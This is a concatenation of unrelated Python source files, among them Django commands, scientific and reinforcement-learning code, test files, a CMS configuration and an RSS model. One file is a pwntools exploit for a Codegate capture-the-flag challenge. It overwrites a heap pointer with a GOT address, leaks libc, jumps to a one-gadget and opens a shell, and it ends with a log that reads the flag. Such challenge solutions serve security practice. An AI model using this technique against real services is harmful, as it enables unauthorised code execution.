(fileName,fileName) ) print 'Activating latest files' execRemote( 'cd /var/www-cspace.in/setupfiles; python UpdateLatest.py' ) if __name__ == '__main__' : main()
438846
from celery import shared_task from django.conf import settings from courses.bridge import import_courses as bridge_import_courses @shared_task def import_courses(force=False, all=False, catalog=True): bridge_import_courses(force=force, all=all, catalog=catalog)
438870
from .common import h from .objects import CIM_TYPE_SIZES def dump_definition(cd, cl): """ :type cd: ClassDefinition :type cl: ClassLayout """ # TODO: migrate to templating? ret = [] ret.append("classname: %s" % cd.class_name) ret.append("super: %s" % cd.super_class_name) ret.append("ts: %s" % cd.timestamp.isoformat("T")) ret.append("qualifiers:") for k, v in cd.qualifiers.items(): ret.append(" %s: %s" % (k, str(v))) ret.append("properties:") for propname, prop in sorted(cd.properties.items(), key=lambda p: p[1].index): ret.append(" name: %s" % prop.name) ret.append(" type: %s" % prop.type) ret.append(" index: %s" % prop.index) ret.append(" level: %s" % prop.level) ret.append(" offset: %s" % h(prop.offset)) ret.append(" qualifiers:") for k, v in prop.qualifiers.items(): ret.append(" %s: %s" % (k, str(v))) ret.append("layout:") off = 0 if cl is not None: for prop in sorted(cl.properties.values(), key=lambda p: p.index): ret.append(" (%s) %s %s" % (h(off), prop.type, prop.name)) if prop.type.is_array: off += 0x4 else: off += CIM_TYPE_SIZES[prop.type.type] ret.append("=" * 80) ret.append("keys:") for key in cd.keys: ret.append(" %s" % key) ret.append("=" * 80) ret.append(cd.tree()) return "\n".join(ret) def dump_layout(cd, cl): """ :type cd: ClassDefinition :type cl: ClassLayout """ # TODO: migrate to templating? ret = [] ret.append("classname: %s" % cd.class_name) ret.append("super: %s" % cd.super_class_name) ret.append("ts: %s" % cd.timestamp.isoformat("T")) ret.append("qualifiers:") for k, v in cd.qualifiers.items(): ret.append(" %s: %s" % (k, str(v))) ret.append("properties:") for propname, prop in sorted(cl.properties.items(), key=lambda p: p[1].index): ret.append(" name: %s" % prop.name) ret.append(" type: %s" % prop.type) ret.append(" index: %s" % prop.index) ret.append(" level: %s" % prop.level) ret.append(" offset: %s" % h(prop.offset)) ret.append(" qualifiers:") for k, v in prop.qualifiers.items(): ret.append(" %s: %s" % (k, str(v))) ret.append(" has default value: %s" % str(prop.has_default_value)) if prop.has_default_value: ret.append(" is inherited: %s" % str(prop.is_inherited)) dv = str(prop.default_value) ret.append(" default value: %s" % dv) ret.append("layout:") off = 0 if cl is not None: for prop in sorted(cl.properties.values(), key=lambda p: p.index): ret.append(" (%s) %s %s" % (h(off), prop.type, prop.name)) if prop.type.is_array: off += 0x4 else: off += CIM_TYPE_SIZES[prop.type.type] ret.append("=" * 80) ret.append("keys:") for key in cd.keys: ret.append(" %s" % key) ret.append("=" * 80) ret.append(cd.tree()) return "\n".join(ret) def dump_instance(i, encoding=None, encoding_errors='strict'): """ :type i: ClassInstance """ # TODO: migrate to templating? ret = [] cl = i.class_layout cd = cl.class_definition ret.append("classname: %s" % cd.class_name) ret.append("super: %s" % cd.super_class_name) ret.append("key: %s" % str(i.key)) ret.append("timestamp1: %s" % i.ts1) ret.append("timestamp2: %s" % i.ts2) ret.append("properties:") for propname, prop in i.properties.items(): quals = ",".join(["{:s}={:s}".format(str(k), str(v)) for k, v in prop.qualifiers.items()]) if quals != "": quals = " [{:s}]".format(quals) ret.append(quals) if prop.is_initialized: ret.append(" {key:s}={value:s}".format( key=prop.name, value=str(prop.value))) if prop.is_default_value: ret.append(" default value: true") else: ret.append(" {key:s}=nil".format(key=prop.name)) ret.append("") instance_str = "\n".join(ret) # encode to specified encoding (which returns a byte array), # and then decode back to a string if encoding: instance_str = instance_str.encode(encoding=encoding, errors=encoding_errors).decode(encoding) return instance_str
438877
from simpleeval import simple_eval, NameNotDefined from datetime import datetime import uuid import copy import pylabnet.utils.pulseblock.pulse as po import pylabnet.utils.pulseblock.pulse_block as pb from pylabnet.utils.iq_upconversion.iq_calibration import IQ_Calibration from pylabnet.utils.pulseblock.placeholder import Placeholder class PulseblockConstructor(): """Container Class which stores all necessary information to compile full Pulseblock, while retaining the ability to change variables and easy save/load functionality. """ def __init__(self, name, log, var_dict, config=None): self.name = name self.log = log self.var_dict = var_dict self.pulse_specifiers = [] self.pulseblock = None self.config = config if "iq_cal_path" in self.config: self.iq_calibration = IQ_Calibration(log=log) self.iq_calibration.load_calibration(self.config["iq_cal_path"]) def default_placeholder_value(self, placeholder_name): for key in Placeholder.default_values: if placeholder_name.startswith(key): return Placeholder(placeholder_name, Placeholder.default_values[key]) self.log.warn(f"Placeholder name {placeholder_name} not found in defaults, using 0.") return Placeholder(placeholder_name, 0.0) def resolve_value(self, input_val): """ Return value of input_val. If input_val is either already not a string, in which case it will be returned. Alternatively, the input value could be a variable, as defined in the keys in the var_dict. In this case the value associated with this variable will be returned. :input: (str / float / bool etc) Variable value or variable string. """ if type(input_val) is not str: return input_val else: try: return simple_eval(input_val, names=self.var_dict) except NameNotDefined: self.log.warn(f"Could not resolve variable '{input_val}', treating as placeholder.") return self.default_placeholder_value(input_val) def append_value_to_dict(self, search_dict, key, append_dict, fn=None, new_key=None): """ Append a searched value from a search dictionary to a separate dictionary, if the given key exists. :search_dict: search_dict (dict) Dictionary to search the key for :key: (str) Key to query the search dictionary using :append_dict: (dict) Value of the found key will be appended into this dictionary if it exists :fn: (function, optional) Function to be applied to the found value :new_key: (str, optional) New key that the found value will be added to in the append_dict. If not provided, it will use the old key """ if key in search_dict: value = self.resolve_value(search_dict[key]) if fn is not None: value = fn(value) if new_key is None: new_key = key append_dict[new_key] = value def compile_pulseblock(self): """ Compiles the list of pulse_specifiers and var dists into valid Pulseblock. """ pulseblock = pb.PulseBlock(name=self.name) for i, pb_spec in enumerate(self.pulse_specifiers): var_dict = pb_spec.pulsevar_dict arg_dict = {} # Extract parameters from the pulsevar dict offset = self.resolve_value(pb_spec.offset) * 1e-6 arg_dict["ch"] = pb_spec.channel arg_dict["dur"] = self.resolve_value(pb_spec.dur) * 1e-6 self.append_value_to_dict(var_dict, "val", arg_dict) self.append_value_to_dict(var_dict, "amp", arg_dict) self.append_value_to_dict(var_dict, "freq", arg_dict) self.append_value_to_dict(var_dict, "ph", arg_dict) self.append_value_to_dict(var_dict, "stdev", arg_dict, fn=lambda x: 1e-6 * x) self.append_value_to_dict(var_dict, "iq", arg_dict) self.append_value_to_dict(var_dict, "mod", arg_dict) self.append_value_to_dict(var_dict, "mod_freq", arg_dict) self.append_value_to_dict(var_dict, "mod_ph", arg_dict) supported_pulses = { "PTrue": po.PTrue, "PSin": po.PSin, "PGaussian": po.PGaussian, "PConst": po.PConst } # Handle IQ mixing case if "iq" in arg_dict and arg_dict["iq"]: (if_freq, lo_freq, phase_opt, amp_i_opt, amp_q_opt, dc_i_opt, dc_q_opt) = self.iq_calibration.get_optimal_hdawg_and_LO_values(arg_dict["mod_freq"]) self.log.info(f"if={if_freq}, lo={lo_freq}, phase={phase_opt}") # Store the optimal IQ parameters as 2 separate dictionaries arg_dict_i = copy.deepcopy(arg_dict) arg_dict_q = copy.deepcopy(arg_dict) # Modify the channel names arg_dict_i["ch"] = arg_dict["ch"] + "_i" arg_dict_q["ch"] = arg_dict["ch"] + "_q" # Modulation frequency changed to IF arg_dict_i["mod_freq"] = if_freq arg_dict_q["mod_freq"] = if_freq # Relative phase arg_dict_i["mod_ph"] = arg_dict["mod_ph"] + phase_opt[0] # The amplitude is the amplitude of the Sin genarator and is # indepenent of ["amp"], the signal amplitude. arg_dict_i["iq_params"] = {"amp_iq": amp_i_opt[0], "dc_iq": dc_i_opt[0], "lo_freq": lo_freq} arg_dict_q["iq_params"] = {"amp_iq": amp_q_opt[0], "dc_iq": dc_q_opt[0], "lo_freq": lo_freq} arg_dict_list = [arg_dict_i, arg_dict_q] else: arg_dict_list = [arg_dict] # Construct a pulse and add it to the pulseblock # The iteration over arg_dict takes care of the IQ mixing case # idx = 0 is the I portion, idx = 1 is the Q portion. for idx, arg_dict in enumerate(arg_dict_list): # Construct single pulse. if pb_spec.pulsetype in supported_pulses: pulse = supported_pulses[pb_spec.pulsetype](**arg_dict) else: pulse = None self.log.warn(f"Found an unsupported pulse type {pb_spec.pulsetype}") pb_dur = pulseblock.dur prev_t0 = pulseblock.latest_t0 prev_dur = pulseblock.latest_dur # idx = 0 refers to the I pulse (or a normal non-IQ pulse) if idx == 0: # CASE 1 if pb_spec.tref == "Absolute": pulseblock.append_po_as_pb( p_obj=pulse, offset=-pb_dur + offset ) # CASE 2 elif pb_spec.tref in ("After Last Pulse", "At End of Sequence"): # For compatbility with previous naming pulseblock.append_po_as_pb( p_obj=pulse, offset=offset ) # CASE 3 elif pb_spec.tref in ("With Last Pulse", "With Previous Pulse"): # For compatbility with previous naming # Take timing reference based on the last pulse's t0 pulseblock.append_po_as_pb( p_obj=pulse, offset=-pb_dur + prev_t0 + offset ) # CASE 4 elif pb_spec.tref == "After Previous Pulse": # Take timing reference based on the last pulse's t0 and duration pulseblock.append_po_as_pb( p_obj=pulse, offset=-pb_dur + prev_t0 + prev_dur + offset ) # CASE 5 elif pb_spec.tref == "After Last Pulse On Channel": # Get the end time of the last pulse on the ch ch = pb.Channel(name=arg_dict["ch"], is_analog=pulse.is_analog) if ch in pulseblock.p_dict.keys(): last_pulse = pulseblock.p_dict[ch][-1] last_pulsetime = last_pulse.t0 + last_pulse.dur else: last_pulsetime = 0 pulseblock.append_po_as_pb( p_obj=pulse, offset=-pb_dur + last_pulsetime + offset ) else: # idx = 1 here (Q pulse) # Force the 2nd pulse to start at same time as the first # pulse in an IQ mix pulse. Note that prev_t0 is the t0 of # the I pulse since this is executed right after the I pulse. pulseblock.append_po_as_pb( p_obj=pulse, offset=-pb_dur + prev_t0 ) self.pulseblock = pulseblock self.clean_pulseblock_timings() def clean_pulseblock_timings(self): """ Round all timings to 10 decimal places (0.1 ns to avoid floating point problems. """ if self.pulseblock is None: return for ch in self.pulseblock.p_dict.keys(): for p_item in self.pulseblock.p_dict[ch]: # Can't use normal round() for Placeholder as it would # be cast to a plain float. if type(p_item.t0) == Placeholder: p_item.t0.round_val(10) else: p_item.t0 = round(p_item.t0, 10) if type(p_item.dur) == Placeholder: p_item.dur.round_val(10) else: p_item.dur = round(p_item.dur, 10) def get_dict(self): """Get dictionary representing the pulseblock.""" # Compile self.compile_pulseblock() pb_dictionary = {} pb_dictionary["name"] = self.name pb_dictionary["dur"] = self.pulseblock.dur pb_dictionary["timestamp"] = datetime.now().strftime("%d-%b-%Y_%H_%M_%S") pb_dictionary["var_dict"] = self.var_dict pb_dictionary["pulse_specifiers_dicts"] = [ps.get_dict() for ps in self.pulse_specifiers] self.log.info(str(pb_dictionary)) return pb_dictionary def load_as_dict(self): pass class PulseSpecifier(): """Container storing info fully specifiying pulse within pulse sequence.""" def __init__(self, channel, pulsetype, pulsetype_name, is_analog): self.channel = channel self.pulsetype = pulsetype self.pulsetype_name = pulsetype_name self.is_analog = is_analog # Generate random unique identifier. self.uid = uuid.uuid1() def set_timing_info(self, offset, dur, tref): self.offset = offset self.dur = dur self.tref = tref def set_pulse_params(self, pulsevar_dict): self.pulsevar_dict = pulsevar_dict def get_printable_name(self): return f"{self.channel.capitalize()} ({self.pulsetype_name})" # Reader friendly string return. def __str__(self): return self.get_printable_name() def get_dict(self): """Store all member variables as dictionary for easy saving.""" pulse_specifier_dict = {} pulse_specifier_dict['pulsetype'] = self.pulsetype pulse_specifier_dict['channel'] = self.channel pulse_specifier_dict['is_analog'] = self.is_analog pulse_specifier_dict['dur'] = self.dur pulse_specifier_dict['offset'] = self.offset pulse_specifier_dict['tref'] = self.tref pulse_specifier_dict['pulse_vars'] = self.pulsevar_dict pulse_specifier_dict['name'] = self.pulsetype_name return pulse_specifier_dict
438893
from torch.autograd import Variable import torch import torch.optim import copy import numpy as np from .helpers import * from .decoder import * from .fit import * from .wavelet import * def rep_error_deep_decoder(img_np,k=128,convert2ycbcr=False): ''' mse obtained by representing img_np with the deep decoder ''' output_depth = img_np.shape[0] if output_depth == 3 and convert2ycbcr: img = rgb2ycbcr(img_np) else: img = img_np img_var = np_to_var(img).type(dtype) num_channels = [k]*5 net = decodernwv2(output_depth,num_channels_up=num_channels,bn_before_act=True).type(dtype) rnd = 500 numit = 15000 rn = 0.005 mse_n, mse_t, ni, net = fit( num_channels=num_channels, reg_noise_std=rn, reg_noise_decayevery = rnd, num_iter=numit, LR=0.004, img_noisy_var=img_var, net=net, img_clean_var=img_var, find_best=True, ) out_img = net(ni.type(dtype)).data.cpu().numpy()[0] if output_depth == 3 and convert2ycbcr: out_img = ycbcr2rgb(out_img) return psnr(out_img,img_np), out_img, num_param(net) def rep_error_wavelet(img_np,ncoeff=300): ''' mse obtained by representing img_np with wavelet thresholding ncoff coefficients are retained per color channel ''' if img_np.shape[0] == 1: img_np = img_np[0,:,:] out_img_np = denoise_wavelet(img_np, ncoeff=ncoeff, multichannel=False, convert2ycbcr=True, mode='hard') else: img_np = np.transpose(img_np) out_img_np = denoise_wavelet(img_np, ncoeff=ncoeff, multichannel=True, convert2ycbcr=True, mode='hard') # img_np = np.array([img_np[:,:,0],img_np[:,:,1],img_np[:,:,2]]) return psnr(out_img_np,img_np), out_img_np def myimgshow(plt,img): if(img.shape[0] == 1): plt.imshow(np.clip(img[0],0,1),cmap='Greys',interpolation='none') else: plt.imshow(np.clip(img.transpose(1, 2, 0),0,1),interpolation='none')
438920
from .unittest_tools import unittest from quantlib.quotes import SimpleQuote class SimpleQuoteTestCase(unittest.TestCase): def test_round_trip(self): value = 72.03 quote = SimpleQuote(value) self.assertAlmostEqual(value, quote.value) def test_empty_constructor(self): quote = SimpleQuote() self.assertFalse(quote.is_valid) with self.assertRaisesRegexp(RuntimeError, 'invalid SimpleQuote'): x = quote.value # test quote reset quote.value = 1. quote.reset() self.assertFalse(quote.is_valid) with self.assertRaisesRegexp(RuntimeError, 'invalid SimpleQuote'): x = quote.value
438969
from ray.rllib.utils.annotations import override from marltoolbox.algos.amTFT import base_policy, policy_using_rollouts class InversedAmTFTRolloutsTorchPolicy( policy_using_rollouts.AmTFTRolloutsTorchPolicy): """ Instead of simulating the opponent, simulate our own policy and act as if it was the opponent. """ def _init_for_rollout(self, config): super()._init_for_rollout(config) self.ag_id_rollout_reward_to_read = self.own_policy_id @override(base_policy.AmTFTPolicyBase) def _get_information_from_opponent(self, agent_id, agent_ids, episode): own_agent_id = agent_id own_a = episode.last_action_for(own_agent_id) return self.own_previous_obs, self.both_previous_raw_obs, own_a @override(policy_using_rollouts.AmTFTRolloutsTorchPolicy) def _switch_own_and_opp(self, agent_id): output = super()._switch_own_and_opp(agent_id) self.use_opponent_policies = not self.use_opponent_policies return output # @override(policy_using_rollouts.AmTFTRolloutsTorchPolicy) # def _select_algo_to_use_in_eval(self): # assert self.performing_rollouts # # if not self.use_opponent_policies: # if self.n_steps_to_punish == 0: # self.active_algo_idx = base.OPP_COOP_POLICY_IDX # elif self.n_steps_to_punish > 0: # self.active_algo_idx = base.OPP_SELFISH_POLICY_IDX # self.n_steps_to_punish -= 1 # else: # raise ValueError("self.n_steps_to_punish can't be below zero") # else: # # assert self.performing_rollouts # if self.n_steps_to_punish_opponent == 0: # self.active_algo_idx = base.OWN_COOP_POLICY_IDX # elif self.n_steps_to_punish_opponent > 0: # self.active_algo_idx = base.OWN_SELFISH_POLICY_IDX # self.n_steps_to_punish_opponent -= 1 # else: # raise ValueError("self.n_steps_to_punish_opp " # "can't be below zero") # @override(policy_using_rollouts.AmTFTRolloutsTorchPolicy) # def _init_for_rollout(self, config): # super()._init_for_rollout(config) # # the policies stored as opponent_policies are our own policy # # (not the opponent's policies) # self.use_opponent_policies = False # @override(policy_using_rollouts.AmTFTRolloutsTorchPolicy) # def _prepare_to_perform_virtual_rollouts_in_env(self, worker): # outputs = super()._prepare_to_perform_virtual_rollouts_in_env( # worker) # # the policies stored as opponent_policies are our own policy # # (not the opponent's policies) # self.use_opponent_policies = True # return outputs # @override(policy_using_rollouts.AmTFTRolloutsTorchPolicy) # def _stop_performing_virtual_rollouts_in_env(self, n_steps_to_punish): # super()._stop_performing_virtual_rollouts_in_env(n_steps_to_punish) # # the policies stored as opponent_policies are our own policy # # (not the opponent's policies) # self.use_opponent_policies = True # @override(policy_using_rollouts.AmTFTRolloutsTorchPolicy) # def compute_actions( # self, # obs_batch: Union[List[TensorType], TensorType], # state_batches: Optional[List[TensorType]] = None, # prev_action_batch: Union[List[TensorType], TensorType] = None, # prev_reward_batch: Union[List[TensorType], TensorType] = None, # info_batch: Optional[Dict[str, list]] = None, # episodes: Optional[List["MultiAgentEpisode"]] = None, # explore: Optional[bool] = None, # timestep: Optional[int] = None, # **kwargs) -> \ # Tuple[TensorType, List[TensorType], Dict[str, TensorType]]: # # # Option to overwrite action during internal rollouts # if self.use_opponent_policies: # if len(self.overwrite_action) > 0: # actions, state_out, extra_fetches = \ # self.overwrite_action.pop(0) # if self.verbose > 1: # print("overwrite actions", actions, type(actions)) # return actions, state_out, extra_fetches # # return super().compute_actions( # obs_batch, state_batches, prev_action_batch, prev_reward_batch, # info_batch, episodes, explore, timestep, **kwargs) # debit = self._compute_debit( # last_obs, opp_action, worker, base_env, # episode, env_index, coop_opp_simulated_action) # self.n_steps_to_punish = self._compute_punishment_duration( # opp_action, # coop_opp_simulated_action, # worker, # last_obs)
438980
import os.path import sys import traceback from gamescript import start main_dir = os.path.split(os.path.abspath(__file__))[0] if __name__ == "__main__": try: # for printing error log when error exception happen runmenu = start.Mainmenu(main_dir) runmenu.run() except Exception: # Save error output to txt file traceback.print_exc() f = open("error_report.txt", "w") sys.stdout = f exc_type, exc_value, exc_traceback = sys.exc_info() lines = traceback.format_exception(exc_type, exc_value, exc_traceback) print("".join("!! " + line for line in lines)) # Log it or whatever here f.close()
439019
from pwn import * r = remote("ch41l3ng3s.codegate.kr", 3333) def add(name, profile): r.sendline(name) print r.recvuntil("profile") r.sendline(profile) print r.recvuntil(">> ") def sell(idx): r.sendline("S") print r.recvuntil("(number)") r.sendline(str(idx)) print r.recvuntil("?") r.sendline("S") print r.recvuntil(">> ") def buy(size, name, profile): r.sendline("B") print r.recvuntil(">>") r.sendline(str(size)) print r.recvuntil(">>") r.sendline("P") add(name, profile) def modify(idx, prof): r.sendline("V") print r.recvuntil(">> ") r.sendline(str(idx)) print r.recvuntil(">> ") r.sendline("M") print r.recvuntil(">> ") r.sendline(prof) print r.recvuntil(">> ") print r.recvuntil(">> ") for i in range(20): r.sendline("show me the marimo") add("asdf", "asdf") sell(0) buy(1, "aaaa", "aaaaa") buy(10, "bbbb", "bbbbb") sleep(14) modify(0, "A"*0x30+p32(0x0)+p32(0x1000)+p64(0x603018)+p64(0x603018)) r.sendline("B") r.sendline("V") r.sendline("1") rv = r.recvuntil("\x7f")[-6:] libc = u64(rv+"\x00\x00") libc_base = libc - 0x6f690 one_shot = libc_base + 0x45216 print r.recvuntil("ack ?") print r.recvuntil(">>") r.sendline("M") print r.recvuntil(">> ") r.sendline(p64(one_shot)) r.interactive() ''' [*] Switching to interactive mode $ id uid=1000(marimo) gid=1000(marimo) groups=1000(marimo) $ ls flag marimo $ cat flag But_every_cat_is_more_cute_than_Marimo $ '''
439020
from django.core.management.base import BaseCommand from kong.models import Test from kong.models import Site, Type from optparse import OptionParser, make_option class Command(BaseCommand): option_list = BaseCommand.option_list + ( make_option("-t", "--test", dest="test"), make_option("-s", "--site", dest="site"), make_option("-T", "--type", dest="type"), make_option("-l", "--list", dest="list", action="store_true", default=False), ) def handle(self, *args, **options): TEST = options.get('test') SITE = options.get('site') TYPE = options.get('type') LIST = options.get('list') passed = True if TEST: print "Running test: %s" % TEST test = Test.objects.get(slug=TEST) passed = test.run_tests() elif TYPE: print "Running tests for type : %s" % TYPE type = Type.objects.get(slug=TYPE) passed = type.run_tests() elif SITE: print "Running tests for site : %s" % SITE site = Site.objects.get(slug=SITE) passed = site.run_tests() elif LIST: print "All Sites:" for site in Site.objects.all(): print site.slug print "All Tests:" for test in Test.objects.all(): print test.slug else: print "Running tests for all sites" for site in Site.objects.all(): passed = site.run_tests() #This is mainly for Nagios reporting. if passed: return 0 else: return 2
439030
from typing import List, Optional, TypeVar import strawberry from strawberry.annotation import StrawberryAnnotation from strawberry.type import StrawberryList, StrawberryOptional, StrawberryTypeVar def test_basic_string(): annotation = StrawberryAnnotation("str") resolved = annotation.resolve() assert resolved is str def test_list_of_string(): annotation = StrawberryAnnotation(List["int"]) resolved = annotation.resolve() assert isinstance(resolved, StrawberryList) assert resolved.of_type is int assert resolved == StrawberryList(of_type=int) assert resolved == List[int] def test_list_of_string_of_type(): @strawberry.type class NameGoesHere: foo: bool annotation = StrawberryAnnotation(List["NameGoesHere"], namespace=locals()) resolved = annotation.resolve() assert isinstance(resolved, StrawberryList) assert resolved.of_type is NameGoesHere assert resolved == StrawberryList(of_type=NameGoesHere) assert resolved == List[NameGoesHere] def test_optional_of_string(): annotation = StrawberryAnnotation(Optional["bool"]) resolved = annotation.resolve() assert isinstance(resolved, StrawberryOptional) assert resolved.of_type is bool assert resolved == StrawberryOptional(of_type=bool) assert resolved == Optional[bool] def test_string_of_object(): @strawberry.type class StrType: thing: int annotation = StrawberryAnnotation("StrType", namespace=locals()) resolved = annotation.resolve() assert resolved is StrType def test_string_of_type_var(): T = TypeVar("T") annotation = StrawberryAnnotation("T", namespace=locals()) resolved = annotation.resolve() assert isinstance(resolved, StrawberryTypeVar) assert resolved.type_var is T assert resolved == T def test_string_of_list(): namespace = {**locals(), **globals()} annotation = StrawberryAnnotation("List[float]", namespace=namespace) resolved = annotation.resolve() assert isinstance(resolved, StrawberryList) assert resolved.of_type is float assert resolved == StrawberryList(of_type=float) assert resolved == List[float] def test_string_of_list_of_type(): @strawberry.type class BlahBlah: foo: bool namespace = {**locals(), **globals()} annotation = StrawberryAnnotation("List[BlahBlah]", namespace=namespace) resolved = annotation.resolve() assert isinstance(resolved, StrawberryList) assert resolved.of_type is BlahBlah assert resolved == StrawberryList(of_type=BlahBlah) assert resolved == List[BlahBlah] def test_string_of_optional(): namespace = {**locals(), **globals()} annotation = StrawberryAnnotation("Optional[int]", namespace=namespace) resolved = annotation.resolve() assert isinstance(resolved, StrawberryOptional) assert resolved.of_type is int assert resolved == StrawberryOptional(of_type=int) assert resolved == Optional[int] # TODO: Move to object tests to test namespace logic def test_basic_types(): @strawberry.type class Query: name: "str" age: "int" definition = Query._type_definition assert definition.name == "Query" [field1, field2] = definition.fields assert field1.python_name == "name" assert field1.type is str assert field2.python_name == "age" assert field2.type is int # TODO: Move to object tests to test namespace logic def test_optional(): @strawberry.type class Query: name: "Optional[str]" age: "Optional[int]" definition = Query._type_definition assert definition.name == "Query" [field1, field2] = definition.fields assert field1.python_name == "name" assert isinstance(field1.type, StrawberryOptional) assert field1.type.of_type is str assert field2.python_name == "age" assert isinstance(field2.type, StrawberryOptional) assert field2.type.of_type is int # TODO: Move to object tests to test namespace logic def test_basic_list(): @strawberry.type class Query: names: "List[str]" definition = Query._type_definition assert definition.name == "Query" [field] = definition.fields assert field.python_name == "names" assert isinstance(field.type, StrawberryList) assert field.type.of_type is str # TODO: Move to object tests to test namespace logic def test_list_of_types(): global User @strawberry.type class User: name: str @strawberry.type class Query: users: "List[User]" definition = Query._type_definition assert definition.name == "Query" [field] = definition.fields assert field.python_name == "users" assert isinstance(field.type, StrawberryList) assert field.type.of_type is User del User
439035
base_product_page_url = 'https://www.amazon.com/gp/product/' base_amazon_url = 'https://www.amazon.com/' base_questions_url = 'https://www.amazon.com/ask/questions/asin/'
439049
import sys import numpy as np import pytest from baal.utils.plot_utils import make_animation_from_data @pytest.mark.skipif(sys.platform == "darwin", reason="Does not work on Mac.") def test_make_animation_from_data(): x = np.random.rand(4, 2) y = np.random.rand(4) labelled_at = np.random.randint(0, 4, size=[x.shape[0]]) classes = ['pos', 'neg'] result = make_animation_from_data(x, y, labelled_at, classes) assert isinstance(result, list) assert result[0].shape[2] == 3 if __name__ == '__main__': pytest.main()
439075
import sys import re import os import subprocess import collections import json import binascii import base64 from capstone import * from capstone.x86_const import * from capstone.arm_const import * ARCH = CS_ARCH_ARM #MODE = CS_MODE_64 if ARCH == CS_ARCH_X86: md = Cs(CS_ARCH_X86,MODE) elif ARCH == CS_ARCH_ARM: md = Cs(CS_ARCH_ARM,CS_MODE_ARM) md.detail = True class Fin: def __init__(self,path): self.path = path def fin_operand_x86(self,ods): odfin = list() for od in ods: if od.type == X86_OP_REG: odfin.append((od.type,od.value.reg)) elif od.type == X86_OP_MEM: odfin.append((od.type, od.value.mem.base, od.value.mem.index, od.value.mem.scale, od.value.mem.disp)) elif od.type == X86_OP_IMM: odfin.append((od.type,od.value.imm)) return odfin def fin_operand_arm(self,ods): odfin = list() for od in ods: if od.type == ARM_OP_REG: odfin.append((od.type,od.value.reg)) elif od.type == ARM_OP_MEM: odfin.append((od.type, od.value.mem.base, od.value.mem.index, od.value.mem.scale, od.value.mem.disp)) elif od.type == ARM_OP_IMM: odfin.append((od.type,od.value.imm)) else: odfin.append([od.type]) return odfin def fin_ins(self,ins): if ARCH == CS_MODE_32 or ARCH == CS_MODE_64: odfin = self.fin_operand_x86(ins.operands) elif ARCH == CS_ARCH_ARM: odfin = self.fin_operand_arm(ins.operands) return (ins.id,odfin) def fin_blk(self,blk): md.mode = blk['mode'] opfin = list() for ins in md.disasm(blk['code'],0x0): opfin.append(self.fin_ins(ins)) return opfin def get_elf_funclist(self): return json.loads(open(self.path,'r').read()) def get_sym_funclist(self): return list(filter(lambda x: not x['name'].startswith('sub_'),json.loads(open(self.path,'r').read()))) def gen_fin(self,funclist): funcfin = dict() for func in funclist: name = func['name'] print(name) blkdic = {} for blk in func['bb']: blk['code'] = base64.b64decode(blk['code']) if ARCH == CS_ARCH_X86: blk['mode'] = MODE elif ARCH == CS_ARCH_ARM: if blk['mode'] == 1: blk['mode'] = CS_MODE_THUMB else: blk['mode'] = CS_MODE_ARM blkdic[blk['offset']] = blk blkfin = list() blkvis = set() worklist = collections.deque() worklist.append(func['offset']) while len(worklist) > 0: addr = worklist.popleft() if addr in blkvis: continue blkvis.add(addr) blk = blkdic[addr] succ = list(blk['succ']) succ.sort() worklist.extend(succ) blkfin.append(self.fin_blk(blk)) funcfin[func['name']] = (func['offset'],blkfin) return funcfin ''' mergefin = dict() for FILE in sys.argv[1:]: print(FILE) fin = Fin(FILE) funcfin = fin.gen_fin(fin.get_sym_funclist()) mergefin.update(funcfin) open('merge.fin','w').write(json.dumps(mergefin)) print(len(mergefin)) ''' FILE = sys.argv[1] fin = Fin(FILE) funcfin = fin.gen_fin(fin.get_elf_funclist()) open(FILE + '.fin','w').write(json.dumps(funcfin)) print(len(funcfin))
439082
from functools import reduce import pandas as pd from scipy import stats def tabulate_predecessor_fitness(predecessor_df): # root id 0 is the control competitors (i.e., the predecessors) predecessor_df = predecessor_df[ predecessor_df['Root ID'] == 1 ].reset_index() predecessor_df['Series'] = predecessor_df['genome series'] mean_differential = predecessor_df.groupby( ['Series'], )['Fitness Differential'].mean().reset_index( name='Mean Fitness Differential Against Predecessor', ) frac_won = predecessor_df.groupby( ['Series'], )['Fitness Differential'].apply( lambda just_one_series: (just_one_series > 0).sum() / len(just_one_series), ).reset_index( name='Fraction Predecessor Competitions Won', ) null_p = predecessor_df.groupby( ['Series'], )['Fitness Differential'].apply( lambda just_one_series: stats.binom_test( x=(just_one_series > 0).sum(), # number of successes n=len(just_one_series), # number of trials p=0.5, alternative='two-sided', ), ).reset_index( name='Predecessor Competition Null p-value', ) return reduce( lambda left, right: pd.merge( left, right, on='Series', ), [ mean_differential, frac_won, null_p, ], )
439086
from .ext import Admin from .ui.decorators import admin_required from .api.decorators import admin_required_api from . import cli __all__ = ["Admin", "admin_required", "admin_required_api", "cli"]
439090
import FWCore.ParameterSet.Config as cms process = cms.Process("reader") process.maxEvents = cms.untracked.PSet( input = cms.untracked.int32(-1) ) process.load("FWCore.MessageLogger.MessageLogger_cfi") process.MessageLogger.cout.placeholder = cms.untracked.bool(False) process.MessageLogger.cout.threshold = cms.untracked.string('INFO') process.MessageLogger.debugModules = cms.untracked.vstring('*') process.options = cms.untracked.PSet( wantSummary = cms.untracked.bool(True) ) process.source = cms.Source("EmptySource", firstRun= cms.untracked.uint32(298313), numberEventsInLuminosityBlock = cms.untracked.uint32(200), numberEventsInRun = cms.untracked.uint32(0) ) process.rawDataCollector = cms.EDProducer('CSCFileReader', firstEvent = cms.untracked.int32(0), FED856 = cms.untracked.vstring('RUI33'), RUI33 = cms.untracked.vstring('/tmp/barvic/csc_00298313_EmuRUI33_Local_000.raw') ) process.FEVT = cms.OutputModule("PoolOutputModule", fileName = cms.untracked.string("/tmp/barvic/csc_00298313_GEM_Test.root"), outputCommands = cms.untracked.vstring("keep *") ) process.p = cms.Path( process.rawDataCollector) process.outpath = cms.EndPath(process.FEVT)
439093
import feedparser import alkali from alkali import fields class RssLoader(alkali.Storage): def __init__(self, url): self.filename = url def read(self, model_class): feed = feedparser.parse(self.filename) for item in feed['items']: yield item class Episode(alkali.Model): class Meta: storage = RssLoader('https://pythonbytes.fm/episodes/rss') guid = fields.UUIDField(primary_key=True) title = fields.StringField() published = fields.DateTimeField() itunes_episode = fields.IntField() link = fields.StringField() description = fields.StringField() def __str__(self): return f"<Epsiode {self.itunes_episode} - {self.title}>" @property def num(self): return self.itunes_episode db = alkali.Database(models=[Episode]) db.load() # or directly but non-traditionally # Episode.objects.load(Episode.Meta.storage) print("last 10 episodes with 'python' in the title") for ep in Episode.objects.filter(title__rei=r"\bpython\b").order_by('-published').limit(10): print(' ', ep) print("total episode count:", Episode.objects.count) e = Episode.objects.get(itunes_episode=100) print(e.title, e.published.date()) print("episode featuring alkali:", 